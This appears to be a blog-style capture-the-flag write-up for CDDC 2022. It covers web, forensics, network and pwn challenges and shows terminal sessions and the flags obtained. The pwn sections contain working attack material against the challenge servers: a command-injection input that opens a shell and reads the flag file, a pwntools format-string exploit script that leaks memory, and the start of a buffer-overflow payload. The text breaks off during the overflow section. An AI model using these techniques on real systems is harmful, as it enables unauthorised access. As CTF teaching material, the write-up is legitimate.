I managed to get unlimited data SIM card for 330 baht = 14SGD, which helped, as I don't have to spend time thinking about data consumption. The only limitation is that it has a cap on the data speed, but that is not important for CTFs, since they are not that data intensive
Data signal is surprisingly good, even outfield
- Generally 4G 2 bar or so, but very usable.
- This means that I can access the services anywhere, instead of waiting and trying to get signal during ration runs.
Didn't dare to bring a laptop, since its a military exercise, and I didn't want to risk it

Even though I'm in Thailand, it was actually easier in some ways than last year, as we were mainly preparing stuff in camp. Only in the last few hours did we move out to set up for outfield (That's when I entirely did the SPA Challenge). This is compared to last year, where I did the entire CTF outfield.

Now lets move on to the challenge writeups.

Ring 5

Misc - go n c

┌──(kali㉿localhost)-[~]
└─$ nc 13.250.249.51 7101
CDDC22{S1mp1e_Ch4113ng3_just_G0_4nd_S33}
┌──(kali㉿localhost)-[~]
└─$

Forensics - Unknown File

Steps are

Unzip the file -> Get hexadecimal text file
Use Cyberchef to convert hexadecimal text into binary data -> File format is .jpg -> Save as a file
Use fotoforensics webpage to figure out that the photo has hidden pixels, uncover it to get the flag.

~/.../downloads/cddc2022 $ unzip ../Unknown_file.zip
Archive:  ../Unknown_file.zip
  inflating: Unknown_file.txt
~/.../downloads/cddc2022 $

CDDC22{S6oW\_me\_y0u're\_4he\_8est}

Network - Simple Shark

Open pcap given in Wireshark, Export HTTP Objects and Save all of them, and then list the contents of all the files to get the flag

~/.../Documents/cddc2022 $ cd simpleshark/
~/.../cddc2022/simpleshark $ ls
%2f                fury.txt          object110  object29      shark.txt
Meet_the_Real.png  images.jpeg       object119  object30
Reach.pdf          masterpiece.docx  object141  object78
carpe_diem.png     maya_angelou.txt  object148  photo.png
dispair.pdf        object102         object149  pixabay.jpeg
~/.../cddc2022/simpleshark $ cat *.txt
CDDC22{The_s6@rK_H@D_@_F1@99999!!!}
You are the sum total of everything you've ever seen, heard, eaten, smelled, been told, forgot --  it's all there. Everything influences each of us, and because of that I try to make sure that my experiences are positive
Baby shark, doo doo doo doo doo doo. Baby shark, doo doo doo doo doo doo.
 Baby shark, doo doo doo doo doo doo. Baby shark!
Mommy shark, doo doo doo doo doo doo. Mommy shark, doo doo doo doo doo doo.
Mommy shark, doo doo doo doo doo doo. Mommy shark!
~/.../cddc2022/simpleshark $

CDDC22{The\_s6@rK\_H@D\_@\_F1@99999!!!}

Network - SNMP

On looking through the pcap, the string "public1" appears many times in many packets.You can guess the community string is that for use in SNMP scans.

┌──(kali㉿localhost)-[~]
└─$ onesixtyone 13.215.173.140 public1
Scanning 1 hosts, 1 communities
13.215.173.140 [public1] HP ETHERNET MULTI-ENVIRONMENT. The flag is CDDC22{L34king_SNMP_C0mmunity_$}
^C

┌──(kali㉿localhost)-[~]
└─$

More info about SNMP cam be found https://github.com/garyhooks/oscp/blob/master/__REFERENCE__/snmp.md, its an OSCP topic.

CDDC22{L34king\_SNMP\_C0mmunity\_$}

Web - Baby Web

Open web page and inspect element to view the flag

CDDC22{H3lL0\_Spac3\_tr4v3l3r5}

Web - Little Star

Firstly, I tried reading the source code of the webpage. The comment <!-- twinkle_star -> little_star -> flag → would likely be useful. The Javascript source code suggests that the webpage retrieves data from the endpoint

┌──(kali㉿localhost)-[/tmp]
└─$ curl http://13.215.173.140:30013
<html>
<head>
    <meta charset="utf-8">
    <title> Star Cookies </title>
    <link href="/static/css/main.css" rel="stylesheet">
    <script src="/static/js/main.js"></script>
    <script src="/static/js/jquery-3.6.0.min.js"></script>
    <script>
        $(document).ready(function() {
            main();
        })
    </script>
</head>
<body>
    <div id="sky">
        <div class="content">
            <!-- twinkle_star -> little_star -> flag -->
            <div><div class="button" onclick="star()">⭐</div></div>
        </div>
    </div>
</body>
</html>
┌──(kali㉿localhost)-[/tmp]
└─$ curl http://13.215.173.140:30013/static/js/main.js
function star() {
    $.get("/star", function(data, status) {
      html_code = '<div class="button">⭐</div>\n'+data['content'];
      $(".content")[0].innerHTML = html_code;
    })
  }

function main() {
    for(var i = 0; i < 200; i++) {
        //get random dimensions
        var x = Math.random() * 100;
        var y = Math.random() * 50;
        var d = Math.random() * 4;
        var s = Math.random() * 2 + 1.5;
        //create new element and add to html
        var star = document.createElement("div");
        star.classList.add("star");
        var sky = document.getElementById("sky");
        sky.appendChild(star);

        star.style.width = d + "px";
        star.style.height = d + "px";
        star.style.top = y + "%";
        star.style.left = x + "%";
        star.style.animationDuration = s + "s";
      }
}
┌──(kali㉿localhost)-[/tmp]
└─$

I tried monitoring the webpage network requests using Firefox. The /star endpoint provides a HTML element to show an image. There is also a request cookie of "twinkle_star".

I tried changing the request cookie to "flag" to get the flag

┌──(kali㉿localhost)-[/tmp]
└─$ curl http://13.215.173.140:30013/star -X POST
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>405 Method Not Allowed</title>
<h1>Method Not Allowed</h1>
<p>The method is not allowed for the requested URL.</p>

┌──(kali㉿localhost)-[/tmp]
└─$ curl http://13.215.173.140:30013/star --cookie "star=little_star"
{"content":"<div class=\"cookie\">little_star</div> <br /><img class=\"image\" src=\"/static/img/yellostar.gif\">"}

┌──(kali㉿localhost)-[/tmp]
└─$ curl http://13.215.173.140:30013/star --cookie "star=twinkle_star"
{"content":"<div class=\"cookie\">twinkle_star</div> <br /><img class=\"image\" src=\"/static/img/starfall.gif\">"}

┌──(kali㉿localhost)-[/tmp]
└─$ curl http://13.215.173.140:30013/star --cookie "star=flag"
{"content":"<div class=\"cookie\">FLAG!</div> <br /><div class=\"text-rainbow\">CDDC22{B4by_W3b_H4cking_3asy++}</div>"}

┌──(kali㉿localhost)-[/tmp]
└─$

CDDC22{B4by\_W3b\_H4cking\_3asy++}

Pwn - Command Injection

The title of the challenge suggests a command injection, injecting something in the text such that it is interpreted as running a command.

Firstly, I viewed the strings in the binary (Lazy to decompile lol)

It revealed the potential key: Pa$$WoRD1@
It revealed the command to inject in: echo %s

┌──(kali㉿localhost)-[~/Documents/cddc2022]
└─$ strings command_injection
/lib64/ld-linux-x86-64.so.2
libc.so.6
fflush
sprintf
strncmp
puts
__stack_chk_fail
stdin
read
stdout
system
sleep
__cxa_finalize
setvbuf
__libc_start_main
GLIBC_2.4
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
AWAVI
AUATL
[]A\A]A^A_
Key :
Pa$$WoRD1@
echo %s
Wrong key!
Good bye.
;*3$"
GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7698
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
server.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
strncmp@@GLIBC_2.2.5
_ITM_deregisterTMCloneTable
stdout@@GLIBC_2.2.5
puts@@GLIBC_2.2.5
stdin@@GLIBC_2.2.5
_edata
__stack_chk_fail@@GLIBC_2.4
system@@GLIBC_2.2.5
read@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
func
__libc_csu_init
fflush@@GLIBC_2.2.5
__bss_start
main
setvbuf@@GLIBC_2.2.5
sprintf@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
sleep@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment

Testing the given key

┌──(kali㉿localhost)-[~/Documents/cddc2022]
└─$ nc 18.141.181.118 7012                                                              Key : Pa$$WoRD1@                                                                        Pa6344WoRD1@
Good bye.

┌──(kali㉿localhost)-[~/Documents/cddc2022]
└─$ nc 18.141.181.118 7012
Key : aa
Wrong key!

Good bye.

┌──(kali㉿localhost)-[~/Documents/cddc2022]
└─$

Time to add delimiters

We could run multiple commands in 1 line in Linux, by putting ; between commands. I tried to do that, so that the command run is "echo Pa$$WoRD1@;sh", which brings up a shell

┌──(kali㉿localhost)-[~/Documents/cddc2022]
└─$ nc 18.141.181.118 7012
Key : Pa$$WoRD1@;sh
Pa6782WoRD1@
pwd
/home/user
ls -al
total 28
drwxr-x--- 1 root user 4096 Jun  9 17:36 .
drwxr-xr-x 1 root root 4096 Jun  9 17:36 ..
-r--r----- 1 root user   36 May 30 17:27 flag
-rwxr-x--- 1 root user 8800 May 30 17:27 prob
-rwxr-x--- 1 root user   62 Jun  9 17:36 run
^C

Trying to read flag

┌──(kali㉿localhost)-[~/Documents/cddc2022]
└─$ nc 18.141.181.118 7012
Key : Pa$$WoRD1@;sh
Pa7104WoRD1@
ls -al
total 28
drwxr-x--- 1 root user 4096 Jun  9 17:36 .
drwxr-xr-x 1 root root 4096 Jun  9 17:36 ..
-r--r----- 1 root user   36 May 30 17:27 flag
-rwxr-x--- 1 root user 8800 May 30 17:27 prob
-rwxr-x--- 1 root user   62 Jun  9 17:36 run
cat flag
CDDC22{H3h3_1nject1ng_c0Mmand_Fun~!}
^C

┌──(kali㉿localhost)-[~/Documents/cddc2022]
└─$

Pwn - Simple format string Attack

I firstly decompiled it with Retdec.

//
// This file was generated by the Retargetable Decompiler
// Website: https://retdec.com
// Copyright (c) Retargetable Decompiler <info@retdec.com>
//

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// ------------------------ Structures ------------------------

struct _IO_FILE {
    int32_t e0;
};

// ------------------- Function Prototypes --------------------

int64_t __do_global_dtors_aux(void);
int64_t __libc_csu_fini(void);
int64_t __libc_csu_init(int64_t a1, int64_t a2, int64_t a3);
int64_t _fini(void);
int64_t _init(void);
int64_t _start(int64_t a1, int64_t a2, int64_t a3, int64_t a4);
int64_t deregister_tm_clones(void);
int64_t frame_dummy(void);
int32_t function_7b0(char * s1, char * s2, int32_t n);
int32_t function_7c0(int64_t * ptr, int32_t size, int32_t n, struct _IO_FILE * stream);
int32_t function_7d0(struct _IO_FILE * stream);
void function_7e0(void);
int32_t function_7f0(char * format, ...);
char * function_800(char * s, int32_t n, struct _IO_FILE * stream);
int32_t function_810(struct _IO_FILE * stream, char * buf, int32_t modes, int32_t n);
struct _IO_FILE * function_820(char * filename, char * modes);
void function_830(char * s);
void function_840(int32_t status);
void function_850(int64_t * d);
int64_t readflag(void);
int64_t register_tm_clones(void);

// --------------------- Global Variables ---------------------

int64_t g1 = 2400; // 0x200d70
int64_t g2 = 2336; // 0x200d78
struct _IO_FILE * g3 = NULL; // 0x201020
struct _IO_FILE * g4 = NULL; // 0x201030
char g5 = 0; // 0x201038
char * g6; // 0x201040
int32_t g7 = 0; // 0x400
int32_t g8;

// ------------------------ Functions -------------------------

// Address range: 0x788 - 0x79f
int64_t _init(void) {
    int64_t result = 0; // 0x796
    if (*(int64_t *)0x200fe8 != 0) {
        // 0x798
        __gmon_start__();
        result = &g8;
    }
    // 0x79a
    return result;
}

// Address range: 0x7b0 - 0x7b6
int32_t function_7b0(char * s1, char * s2, int32_t n) {
    // 0x7b0
    return strncmp(s1, s2, n);
}

// Address range: 0x7c0 - 0x7c6
int32_t function_7c0(int64_t * ptr, int32_t size, int32_t n, struct _IO_FILE * stream) {
    // 0x7c0
    return fread(ptr, size, n, stream);
}

// Address range: 0x7d0 - 0x7d6
int32_t function_7d0(struct _IO_FILE * stream) {
    // 0x7d0
    return fclose(stream);
}

// Address range: 0x7e0 - 0x7e6
void function_7e0(void) {
    // 0x7e0
    __stack_chk_fail();
}

// Address range: 0x7f0 - 0x7f6
int32_t function_7f0(char * format, ...) {
    // 0x7f0
    return printf(format);
}

// Address range: 0x800 - 0x806
char * function_800(char * s, int32_t n, struct _IO_FILE * stream) {
    // 0x800
    return fgets(s, n, stream);
}

// Address range: 0x810 - 0x816
int32_t function_810(struct _IO_FILE * stream, char * buf, int32_t modes, int32_t n) {
    // 0x810
    return setvbuf(stream, buf, modes, n);
}

// Address range: 0x820 - 0x826
struct _IO_FILE * function_820(char * filename, char * modes) {
    // 0x820
    return fopen(filename, modes);
}

// Address range: 0x830 - 0x836
void function_830(char * s) {
    // 0x830
    perror(s);
}

// Address range: 0x840 - 0x846
void function_840(int32_t status) {
    // 0x840
    exit(status);
}

// Address range: 0x850 - 0x856
void function_850(int64_t * d) {
    // 0x850
    __cxa_finalize(d);
}

// Address range: 0x860 - 0x88b
int64_t _start(int64_t a1, int64_t a2, int64_t a3, int64_t a4) {
    // 0x860
    int64_t v1; // 0x860
    __libc_start_main(2518, (int32_t)a4, (char **)&v1, (void (*)())2816, (void (*)())2928, (void (*)())a3);
    __asm_hlt();
    // UNREACHABLE
}

// Address range: 0x890 - 0x8c2
int64_t deregister_tm_clones(void) {
    // 0x890
    return (int64_t)&g3;
}

// Address range: 0x8d0 - 0x912
int64_t register_tm_clones(void) {
    // 0x8d0
    return 0;
}

// Address range: 0x920 - 0x95a
int64_t __do_global_dtors_aux(void) {
    // 0x920
    if (g5 != 0) {
        // 0x958
        int64_t result; // 0x920
        return result;
    }
    // 0x929
    if (*(int64_t *)0x200ff8 != 0) {
        // 0x937
        __cxa_finalize((int64_t *)*(int64_t *)0x201008);
    }
    int64_t result2 = deregister_tm_clones(); // 0x943
    g5 = 1;
    return result2;
}

// Address range: 0x960 - 0x96a
int64_t frame_dummy(void) {
    // 0x960
    return register_tm_clones();
}

// Address range: 0x96a - 0x9d6
int64_t readflag(void) {
    struct _IO_FILE * file = fopen("flag", "rb"); // 0x980
    if (file != NULL) {
        // 0x9a6
        fread((int64_t *)&g6, (int32_t)&g7, 1, file);
        fclose(file);
        return 0;
    }
    // 0x990
    perror("[-] flag file ");
    exit(0);
    // UNREACHABLE
}

// Address range: 0x9d6 - 0xaf7
int main(int argc, char ** argv) {
    int64_t v1 = __readfsqword(40); // 0x9e1
    setvbuf(g3, NULL, 1, 0);
    setvbuf(g4, NULL, 1, 0);
    readflag();
    printf("[+] password => %p\n", (int64_t *)"P4s$w0rD");
    int64_t str; // bp-1048, 0x9d6
    fgets((char *)&str, (int32_t)&g7, g4);
    printf((char *)&str);
    if (strncmp("P4s$w0rD", "weakpass", 8) != 0) {
        // 0xac4
        printf("[!] password is %s\n", "P4s$w0rD");
    } else {
        // 0xaaa
        printf("[+] %s", (char *)&g6);
    }
    int64_t result = 0; // 0xaee
    if (v1 != __readfsqword(40)) {
        // 0xaf0
        __stack_chk_fail();
        result = &g8;
    }
    // 0xaf5
    return result;
}

// Address range: 0xb00 - 0xb65
int64_t __libc_csu_init(int64_t a1, int64_t a2, int64_t a3) {
    int64_t result = _init(); // 0xb2c
    if ((int64_t)&g2 - (int64_t)&g1 >> 3 == 0) {
        // 0xb56
        return result;
    }
    int64_t v1 = 0; // 0xb34
    while (v1 + 1 != (int64_t)&g2 - (int64_t)&g1 >> 3) {
        // 0xb40
        v1++;
    }
    // 0xb56
    return result;
}

// Address range: 0xb70 - 0xb72
int64_t __libc_csu_fini(void) {
    // 0xb70
    int64_t result; // 0xb70
    return result;
}

// Address range: 0xb74 - 0xb7d
int64_t _fini(void) {
    // 0xb74
    int64_t result; // 0xb74
    return result;
}

// --------------- Dynamically Linked Functions ---------------

// void __cxa_finalize(void * d);
// void __gmon_start__(void);
// int __libc_start_main(int *(main)(int, char **, char **), int argc, char ** ubp_av, void(* init)(void), void(* fini)(void), void(* rtld_fini)(void), void(* stack_end));
// void __stack_chk_fail(void);
// void exit(int status);
// int fclose(FILE * stream);
// char * fgets(char * restrict s, int n, FILE * restrict stream);
// FILE * fopen(const char * restrict filename, const char * restrict modes);
// size_t fread(void * restrict ptr, size_t size, size_t n, FILE * restrict stream);
// void perror(const char * s);
// int printf(const char * restrict format, ...);
// int setvbuf(FILE * restrict stream, char * restrict buf, int modes, size_t n);
// int strncmp(const char * s1, const char * s2, size_t n);

// --------------------- Meta-Information ---------------------

// Detected compiler/packer: gcc (7.5.0)
// Detected functions: 22

I also disassembled it using objdump -M intel -d fmt

00000000000009d6 <main>:
 9d6:   55                      push   rbp
 9d7:   48 89 e5                mov    rbp,rsp
 9da:   48 81 ec 20 04 00 00    sub    rsp,0x420
 9e1:   64 48 8b 04 25 28 00    mov    rax,QWORD PTR fs:0x28
 9e8:   00 00
 9ea:   48 89 45 f8             mov    QWORD PTR [rbp-0x8],rax
 9ee:   31 c0                   xor    eax,eax
 9f0:   48 8b 05 29 06 20 00    mov    rax,QWORD PTR [rip+0x200629]        # 201020 <stdout@GLIBC_2.2.5>
 9f7:   b9 00 00 00 00          mov    ecx,0x0
 9fc:   ba 01 00 00 00          mov    edx,0x1
 a01:   be 00 00 00 00          mov    esi,0x0
 a06:   48 89 c7                mov    rdi,rax
 a09:   e8 02 fe ff ff          call   810 <setvbuf@plt>
 a0e:   48 8b 05 1b 06 20 00    mov    rax,QWORD PTR [rip+0x20061b]        # 201030 <stdin@GLIBC_2.2.5>
 a15:   b9 00 00 00 00          mov    ecx,0x0
 a1a:   ba 01 00 00 00          mov    edx,0x1
 a1f:   be 00 00 00 00          mov    esi,0x0
 a24:   48 89 c7                mov    rdi,rax
 a27:   e8 e4 fd ff ff          call   810 <setvbuf@plt>
 a2c:   48 8d 05 dd 05 20 00    lea    rax,[rip+0x2005dd]        # 201010 <password>
 a33:   48 89 85 e8 fb ff ff    mov    QWORD PTR [rbp-0x418],rax
 a3a:   b8 00 00 00 00          mov    eax,0x0
 a3f:   e8 26 ff ff ff          call   96a <readflag>
 a44:   48 8b 85 e8 fb ff ff    mov    rax,QWORD PTR [rbp-0x418]
 a4b:   48 89 c6                mov    rsi,rax
 a4e:   48 8d 3d 46 01 00 00    lea    rdi,[rip+0x146]        # b9b <_IO_stdin_used+0x1b>
 a55:   b8 00 00 00 00          mov    eax,0x0
 a5a:   e8 91 fd ff ff          call   7f0 <printf@plt>
 a5f:   48 8b 15 ca 05 20 00    mov    rdx,QWORD PTR [rip+0x2005ca]        # 201030 <stdin@GLIBC_2.2.5>
 a66:   48 8d 85 f0 fb ff ff    lea    rax,[rbp-0x410]
 a6d:   be 00 04 00 00          mov    esi,0x400
 a72:   48 89 c7                mov    rdi,rax
 a75:   e8 86 fd ff ff          call   800 <fgets@plt>
 a7a:   48 8d 85 f0 fb ff ff    lea    rax,[rbp-0x410]
 a81:   48 89 c7                mov    rdi,rax
 a84:   b8 00 00 00 00          mov    eax,0x0
 a89:   e8 62 fd ff ff          call   7f0 <printf@plt>
 a8e:   ba 08 00 00 00          mov    edx,0x8
 a93:   48 8d 35 15 01 00 00    lea    rsi,[rip+0x115]        # baf <_IO_stdin_used+0x2f>
 a9a:   48 8d 3d 6f 05 20 00    lea    rdi,[rip+0x20056f]        # 201010 <password>
 aa1:   e8 0a fd ff ff          call   7b0 <strncmp@plt>
 aa6:   85 c0                   test   eax,eax
 aa8:   75 1a                   jne    ac4 <main+0xee>
 aaa:   48 8d 35 8f 05 20 00    lea    rsi,[rip+0x20058f]        # 201040 <flag>
 ab1:   48 8d 3d 00 01 00 00    lea    rdi,[rip+0x100]        # bb8 <_IO_stdin_used+0x38>
 ab8:   b8 00 00 00 00          mov    eax,0x0
 abd:   e8 2e fd ff ff          call   7f0 <printf@plt>
 ac2:   eb 18                   jmp    adc <main+0x106>
 ac4:   48 8d 35 45 05 20 00    lea    rsi,[rip+0x200545]        # 201010 <password>
 acb:   48 8d 3d ed 00 00 00    lea    rdi,[rip+0xed]        # bbf <_IO_stdin_used+0x3f>
 ad2:   b8 00 00 00 00          mov    eax,0x0
 ad7:   e8 14 fd ff ff          call   7f0 <printf@plt>
 adc:   b8 00 00 00 00          mov    eax,0x0
 ae1:   48 8b 4d f8             mov    rcx,QWORD PTR [rbp-0x8]
 ae5:   64 48 33 0c 25 28 00    xor    rcx,QWORD PTR fs:0x28
 aec:   00 00
 aee:   74 05                   je     af5 <main+0x11f>
 af0:   e8 eb fc ff ff          call   7e0 <__stack_chk_fail@plt>
 af5:   c9                      leave
 af6:   c3                      ret
 af7:   66 0f 1f 84 00 00 00    nop    WORD PTR [rax+rax*1+0x0]
 afe:   00 00

At first, I thought maybe we would overwrite the password variable with weakpass. The password variable address is initially given before any format string input happens, so we could read that using pwntools, put it on the string along with a format string write, and overwrite the contents of the variable. The execution flow goes into the other branch of the if statement to show the flag

I tried to access the contents of the input from the format string. This shows that the 8th argument is the start of the contents of the string ('A' = 0x41)

┌──(hacker㉿DESKTOP-SR8M2PL)-[~/Stuff/cddc2022]
└─$ python3 -c "print('A'*16+'%x__'*10)"|./fmt
[+] password => 0x55688a401010
AAAAAAAAAAAAAAAA8b1e1891__0__8b1e18c9__8af2a2b0__92664c00__8af2a3e0__8a401010__41414141__41414141__5f5f7825__
[!] password is P4s$w0rD

┌──(hacker㉿DESKTOP-SR8M2PL)-[~/Stuff/cddc2022]
└─$

One of the main issue with 64 but addresses is that there are leading null bytes. After some research, I found https://tripoloski1337.github.io/ctf/2020/06/11/format-string-bug.html. I could put the address at the back of the payload string. Something like this

[Write][Padding][Address in Little Endian]\x00\x00…

We tried putting in the password variable address in the payload and accessing it

We calculate the argument to read from based on the length of the string
We have to pad between the different sections of the payload (reading, address) such that things are aligned by a group of 8 bytes. This makes it easier to calculate the argument to read from in the format string.

This here is a rough Proof of Concept

┌──(hacker㉿DESKTOP-SR8M2PL)-[~/Stuff/cddc2022]
└─$ python2 fmt.py
[+] Starting local process './fmt': pid 4899
('[+] password => 0x563486e01010\n', '0x563486e01010')
['10', '10', 'e0', '86', '34', '56', '0x', '']
(1801545079,)
[*] Switching to interactive mode
[*] Process './fmt' stopped with exit code 0 (pid 4899)
AAAA0x563486e01010_______\x10V[!] password is P4s$w0rD
[*] Got EOF while reading in interactive
$

┌──(hacker㉿DESKTOP-SR8M2PL)-[~/Stuff/cddc2022]
└─$ cat fmt.py
from pwn import *
import struct

io = process('./fmt')
#io.sendline('')
x = io.recvuntil('\n')

passloc = (x.split()[-1])
print(x,passloc)
slicing = []
for i in range(1,16,2):
  slicing.append( passloc[-i:-i-2:-1][::-1] )

print(slicing)

payload = ''
payload += "AAAA" # Posiiton 8
#payload +=  "_______"
payload += "%10$p"
payload += "_______"
#for i in range(4): payload += eval("'\\x"+slicing[i]+"'")
for i in range(0,6):
    payload += eval("'\\x"+slicing[i]+"'")
#payload += "AAAA"
payload += "\x00\x00"

## Writes #####################
wr1 = "weak" #"pass"
iwr1 = struct.unpack("<L",wr1)
print(iwr1)

###
io.sendline(payload)                                                                   
io.interactive()

┌──(hacker㉿DESKTOP-SR8M2PL)-[~/Stuff/cddc2022]                                         
└─$

Afterwards, I tried making an exploit to overwrite a character of the password variable. I automatically calculated the padding needed to write, as well as for the alignment

from pwn import *
import struct

io = process('./fmt')                                                                   
#io.sendline('')                                                                        
x = io.recvuntil('\n')

passloc = (x.split()[-1])
print(x,passloc)

### Getting Address ############
slicing = []                                                                            
for i in range(1,16,2):
  slicing.append( passloc[-i:-i-2:-1][::-1] )                                                                                                                                   print(slicing)                          

## Writes #####################                                                         
pad1 = "%{}c".format(
    ord('w')+ ord('e')*0x100 #+ ord ('a')*0x10000 #+ ord('k')*0x1000000
) # Posiiton 8                                                                          
pad1no = len(pad1) // 8                                                                 
print(pad1no)
write1 = "%{}$n".format(7 + pad1no + (len(pad1) % 8 > 0) + 2)
align = "_" * (8- len(pad1) % 8)
align += "-"* (8- len(write1)%8 )

address = ""
for i in range(0,6):
    address += eval("'\\x"+slicing[i]+"'")
address += "\x00\x00"                                                                   
payload = pad1+ write1 + align +  address                                               
print(payload)
###
io.sendline(payload)
io.interactive()

┌──(hacker㉿DESKTOP-SR8M2PL)-[~/Stuff/cddc2022]                                         
└─$ python2 fmtt/wea.py                                                                 
[+] Starting local process './fmt': pid 6517                                           
 ('[+] password => 0x563e2cc01010\n', '0x563e2cc01010')                                  
['10', '10', 'c0', '2c', '3e', '56', '0x', '']                                          
8319100072149214583                                                                    
0                                                                                       
%25975c%10$n_---\x10,>V\x00                                                            
 [*] Switching to interactive mode
… 
\x91_---\x10,>V[!] password is we                                                 
[*] Got EOF while reading in interactive
$

On trying to scale this to 4 bytes, the ASCII value of "weak" or any other 4 letter word becomes too large that it would be very difficult to write and test.

Not to mention that %n can only write 4 bytes at once, and not 8, so 2 writes are needed. However, we can only put 1 address in the payload, as the terminating characters of the string need to be used.

Maybe there's another way to do this. On looking at the code, maybe instead of changing code execution, we change the address from the password variable to the flag variable?

We read in the password variable address, calculate the flag variable using the offsets from the diaassembly (201010 and 201040 respectively), put it in the payload and read it.

 a9a:   48 8d 3d 6f 05 20 00    lea    rdi,[rip+0x20056f]        # 201010 <password>
 aa1:   e8 0a fd ff ff          call   7b0 <strncmp@plt>
 aa6:   85 c0                   test   eax,eax
 aa8:   75 1a                   jne    ac4 <main+0xee>
 aaa:   48 8d 35 8f 05 20 00    lea    rsi,[rip+0x20058f]        # 201040 <flag>

This ended up working well.

from pwn import *
import struct

#io = process('./fmt')
io = remote('13.213.59.167', 7011)
#io.sendline('')
x = io.recvuntil('\n')

passloc = (x.split()[-1])
print(x,passloc)

p=eval(passloc) - 0x201010 + 0x201040
pp = "%#x" % p
passloc =pp
slicing = []
for i in range(1,16,2):
  slicing.append( passloc[-i:-i-2:-1][::-1] )

print(slicing,pp)

## Writes #####################
wr1 = "weakpass"
iwr1 = struct.unpack("<Q",wr1)[0]
#iwr2 = struct.unpack("<L",wr2)[0]
print(iwr1)
#iwr1=4

###############################

pad1 = "%{}c".format(4) # Posiiton 8
pad1no = len(pad1) // 8
print(pad1no)
write1 = "%{}$s".format(7 + pad1no + (len(pad1) % 8 > 0) + 2)
align = "_" * (8- len(pad1) % 8)
align += "-"* (8- len(write1)%8 )


address = ""
for i in range(0,6):
    address += eval("'\\x"+slicing[i]+"'")
address += "\x00\x00"

payload = pad1+ write1 + align +  address
print(payload)
###
io.sendline(payload)
io.interactive()

┌──(hacker㉿DESKTOP-SR8M2PL)-[~/Stuff/cddc2022]
└─$ python2 fmt.py
[+] Opening connection to 13.213.59.167 on port 7011: Done
('[+] password => 0x5570ddc01010\n', '0x5570ddc01010')
(['40', '10', 'c0', 'dd', '70', '55', '0x', ''], '0x5570ddc01040')
8319100072149214583
0
%4c%10$s_____---@\x10U\x00
[*] Switching to interactive mode
   \x91CDDC22{B3_c4reful_t0_use_F0rmat_Str1ng!}_____---@\x10U[!] password is P4s$w0rD
[*] Got EOF while reading in interactive
$

CDDC22{B3\_c4reful\_t0\_use\_F0rmat\_Str1ng!}

Pwn - Simple bof

This is a standard buffer Overflow challenge, can read more on the topic first if you don't understand. Watch LiveOverflow videos or something.

Firstly, I checked the binary for any protections (of which there are none)

┌──(hacker㉿DESKTOP-SR8M2PL)-[~/Stuff/cddc2022]
└─$ checksec --file=overwriteme
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH     Symbols          FORTIFY Fortified       Fortifiable     FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   76) Symbols       No    0               3               overwriteme                                                                                                             ┌──(hacker㉿DESKTOP-SR8M2PL)-[~/Stuff/cddc2022]                                         └─$ objdump -d -M intel overwriteme > disassembly.html

┌──(hacker㉿DESKTOP-SR8M2PL)-[~/Stuff/cddc2022]
└─$

I decompiled it with retdec

~/.../cddc2022/somesharks $ cat ~/storage/downloads/decompiled/tmp/decompilation/overwriteme.c
//
// This file was generated by the Retargetable Decompiler
// Website: https://retdec.com
// Copyright (c) Retargetable Decompiler <info@retdec.com>
//

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

// ------------------------ Structures ------------------------

struct _IO_FILE {
    int32_t e0;
};

// ------------------- Function Prototypes --------------------

int64_t func(void);

// --------------------- Global Variables ---------------------

struct _IO_FILE * g1 = NULL; // 0x601080
struct _IO_FILE * g2 = NULL; // 0x601090

// ------------------------ Functions -------------------------

// Address range: 0x4008b7 - 0x40092e
int64_t func(void) {
    // 0x4008b7
    printf("Key : ");
    fflush(g1);
    int64_t buf; // bp-24, 0x4008b7
    read(0, &buf, 32);
    int32_t puts_rc; // 0x4008b7
    if (strncmp((char *)&buf, "weakpass", 10) != 0) {
        // 0x40091f
        puts_rc = puts("Login FAILED!!");
    } else {
        // 0x400911
        puts_rc = puts("Login Successful!");
    }
    // 0x40092b
    return puts_rc;
}

// Address range: 0x40092e - 0x40098a
int main(int argc, char ** argv) {
    // 0x40092e
    setvbuf(g1, NULL, 1, 0);
    setvbuf(g2, NULL, 1, 0);
    func();
    return 0;
}

// --------------- Dynamically Linked Functions ---------------

// int fflush(FILE * stream);
// int printf(const char * restrict format, ...);
// int puts(const char * s);
// ssize_t read(int fd, void * buf, size_t nbytes);
// int setvbuf(FILE * restrict stream, char * restrict buf, int modes, size_t n);
// int strncmp(const char * s1, const char * s2, size_t n);

// --------------------- Meta-Information ---------------------

// Detected compiler/packer: gcc (7.5.0)
// Detected functions: 2
~/.../cddc2022/somesharks $

I tried overflowing the buffer to the RIP

I put weakpass\x00 to pass the password check (May as well)
Surprisingly the string doesn't terminate at the null byte, though that's the problem with read()
The disassembly (from objdump) gives you the address of the function printflag(). I put its full 64 bit address (including leading null bytes) at the end of the payload
I fuzzed (tested) the padding between the password and the address manually, such that the address would overwrite the RIP (instruction pointer register)
- I used gdb to check the registers

┌──(hacker㉿DESKTOP-SR8M2PL)-[~/Stuff/cddc2022]
└─$ python3 -c "print('weakpass\x00'+'A'*15+'\x37\x08\x40\x00\x00')" > /tmp/t

┌──(hacker㉿DESKTOP-SR8M2PL)-[~/Stuff/cddc2022]
